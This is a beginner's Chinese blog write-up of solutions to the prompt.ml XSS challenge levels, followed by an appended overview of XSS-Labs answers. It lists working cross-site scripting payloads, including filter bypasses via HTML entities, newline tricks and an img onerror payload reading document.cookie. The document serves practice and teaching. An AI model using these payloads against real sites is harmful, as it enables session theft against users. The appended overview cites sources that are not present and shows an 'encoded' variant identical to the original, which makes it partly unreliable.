初学XSS----2

经过了昨天的洗礼,今天换了个网站看一下

链接:http://prompt.ml/1

0、无过滤:"><script>prompt(1)</script>

1、过滤了</xxx>这种:<img onerror=prompt(1) src=1 就行,没毛病

2、过滤[=(]:我们需要的括号用html编码搞定 <svg><script>prompt&#40;1) </script>

3、->过滤为_:--!><script>prompt(1)</script> 

4、

5、>|on.+?=|focus替换为_:type可以被我们覆盖掉,想的是直接改成img 然后onerror 可是没有等号前on.+?=|focus这顿操作让我们没法输入东西,但是我们有换行符

payload:  " type=image src onerror
                ="prompt(1)

6、

7、

8、

9、

A、

B、

C、

D、

E、

F、

### XSS-Labs 解法教程与实验答案 XSS (Cross-Site Scripting) 是一种常见的安全漏洞,攻击者可以通过注入恶意脚本影响用户的浏览器行为。以下是关于如何解决 XSS-Labs 靶场的一些常见解法以及学习资源。 #### 关于 PHP 替换 `<` 和 `>` 的处理方式 当服务器端通过 PHP 将输入中的尖括号 (`<`, `>`) 进行过滤并替换为空字符串时,可以尝试利用 HTML 属性或 JavaScript 事件来绕过这种简单的防护机制。例如,在某些场景下,可以使用无标签的属性组合触发 XSS 攻击[^1]: ```html <input value="javascript:alert(1)" onclick="eval(this.value)"> ``` 上述代码片段展示了如何通过设置 `value` 属性为可执行的 JavaScript 并结合 `onclick` 事件实现弹窗效果。 --- #### 常见 XSS-Labs 题目解析 ##### 第一关至第五关基础 XSS 测试 这些题目通常涉及反射型 XSS 的基本原理。用户提交的数据会被直接返回到页面上而未经过滤。最简单的方式是测试以下 Payload 是否生效: ```html <script>alert('XSS')</script> ``` 如果被转义,则可以尝试其他变种形式,比如 Unicode 编码或者 HTML 实体编码[^2]: ```html <script>alert('XSS')</script> ``` ##### 中级挑战(第六关至第十关) 此阶段可能引入了一些额外的安全措施,如移除特定字符、HTML 转义等。此时需要更复杂的技巧,例如嵌套标签、伪协议调用等方式突破防御逻辑。举例如下: ```html <img src=x onerror=alert(document.cookie)> ``` 该 Payload 利用了图片加载失败后的回调函数完成跨站脚本注入操作[^3]。 ##### 高级部分(第十一关及以上) 高级别的题目往往综合运用多种技术手段防范潜在威胁,包括但不限于 WAF(Web Application Firewall),严格的 CSP(Content Security Policy) 设置等等。针对这种情况下的解决方案更加多样化且依赖具体环境配置情况分析得出结论。 --- #### 学习资源推荐 对于希望深入理解并实践 XSS 技术的学习者来说,除了参与像 XSS-Labs 这样的在线平台练习外,还可以参考如下资料进一步提升技能水平: - OWASP 官方文档提供了详尽描述各类 Web 应用程序安全性议题的文章集合。 - PortSwigger Academy 提供了一系列免费课程帮助初学者掌握现代网络安全概念及其应用实例说明[^4]。 另外也可以关注一些知名博主分享的技术博文系列文章作为补充材料阅读源之一。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值